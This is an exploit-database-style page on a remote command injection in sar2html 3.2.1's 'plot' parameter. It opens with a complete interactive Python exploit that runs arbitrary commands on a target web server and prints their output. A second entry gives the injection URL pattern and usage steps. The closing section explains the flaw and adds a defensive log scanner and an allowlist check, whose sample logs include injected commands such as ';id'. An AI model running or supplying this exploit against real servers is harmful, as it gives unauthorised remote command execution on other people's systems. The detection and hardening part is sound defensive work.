# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

```python
#!/usr/bin/env python3
# Interactive prompt that injects each typed command into sar2html's 'plot'
# parameter and prints the command output parsed out of the host <option> list.

import re
from cmd import Cmd

import requests

url = input("Enter The url => ")


class Terminal(Cmd):
    prompt = "Command => "

    def default(self, args):
        exploiter(args)


def exploiter(cmd):
    global url
    sess = requests.session()
    out = []
    try:
        output = sess.get(f"{url}/index.php?plot=;{cmd}")
        # The injected command's output is echoed back inside <option value=...> entries.
        out = re.findall("<option value=(.*?)>", output.text)
    except requests.RequestException:
        print("Error!!")
    for line in out:
        # Skip the application's own placeholder and "selected" entries.
        if ("There is no defined host..." not in line
                and "null selected" not in line
                and "selected" not in line):
            print(line)
    print()


if __name__ == "__main__":
    terminal = Terminal()
    terminal.cmdloop()
```
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage: https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In the web application you will see the index.php?plot URL extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute the command you entered. After the command injection, press "select # host"; your command's output will then appear at the bottom of the scrollable screen.
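Both entries above describe the same defect: the value of the `plot` query parameter reaches a shell, so a leading `;` turns the rest of the value into a second command. From the defender's side the two useful pieces are a log check that flags requests whose decoded `plot` value carries shell metacharacters, and the allowlist check the application should have applied to `plot` before using it. The script below is an added example, not code from either exploit author or from the sar2html project; the log format (combined Apache/nginx style), the sample log lines, the IPs and timestamps are constructed, and the set of "legitimate" plot names accepted by `is_safe_plot` is an assumption rather than sar2html's real list.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Combined-format access log line (Apache/nginx style); an assumed format, not
# taken from the page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a parameter value break out of a shell command line.
SHELL_META = re.compile(r"[;|&`$\n]")

# Assumption: a legitimate plot name is a short alphanumeric token. The real
# application should compare against its actual list of plot names instead.
SAFE_PLOT = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Constructed sample log lines (made-up IPs, timestamps and requests).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Dec/2020:10:15:01 +0000] "GET /index.php?plot=cpu HTTP/1.1" 200 5120
10.0.0.7 - - [27/Dec/2020:10:15:09 +0000] "GET /index.php?plot=;id HTTP/1.1" 200 812
10.0.0.7 - - [27/Dec/2020:10:15:12 +0000] "GET /index.php?plot=%3Bwhoami HTTP/1.1" 200 790
10.0.0.9 - - [27/Dec/2020:10:16:00 +0000] "GET /index.php?plot=mem&host=srv1 HTTP/1.1" 200 5000
10.0.0.9 - - [27/Dec/2020:10:16:05 +0000] "GET /style.css HTTP/1.1" 200 2048
"""


def query_params(path):
    """Split a request path's query string into {name: [values]}, percent-decoded.

    Pairs are split on '&' only, and values are decoded afterwards, so an
    encoded '%3B' becomes a literal ';' that the metacharacter check can see.
    """
    params = {}
    for pair in urlsplit(path).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote_plus(value))
    return params


def is_safe_plot(value):
    """Allowlist check the application should apply to 'plot' before any use."""
    return bool(SAFE_PLOT.match(value))


def find_plot_injections(log_text):
    """Return one finding per request whose decoded 'plot' value contains shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in query_params(m["path"]).get("plot", []):
            if SHELL_META.search(value):
                findings.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "plot": value,
                    "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in find_plot_injections(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} plot={f['plot']!r} status={f['status']}")
```

Decoding before matching matters: the third sample line carries the semicolon as `%3B`, which a raw-string grep for `plot=;` would miss. A 200 status on a flagged request is worth noting, since the write-up says the injected command's output is rendered into the page rather than producing an error. On the application side, rejecting any `plot` value that fails `is_safe_plot` (or, better, that is not one of the known plot names) removes the bug regardless of how the value is encoded, whereas the log check only finds attempts after the fact.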